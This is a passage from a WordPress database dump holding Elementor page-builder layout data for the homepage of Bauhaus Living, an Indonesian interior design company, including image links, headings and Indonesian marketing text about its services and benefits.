us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4201,4917,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4202,4917,'_elementor_pro_version','3.8.1'),(4203,4918,'_wp_page_template','elementor_header_footer'),(4204,4918,'_elementor_edit_mode','builder'),(4205,4918,'_elementor_template_type','wp-page'),(4206,4918,'_elementor_version','3.8.1');
INSERT INTO `wpev_postmeta` VALUES (4207,4918,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout 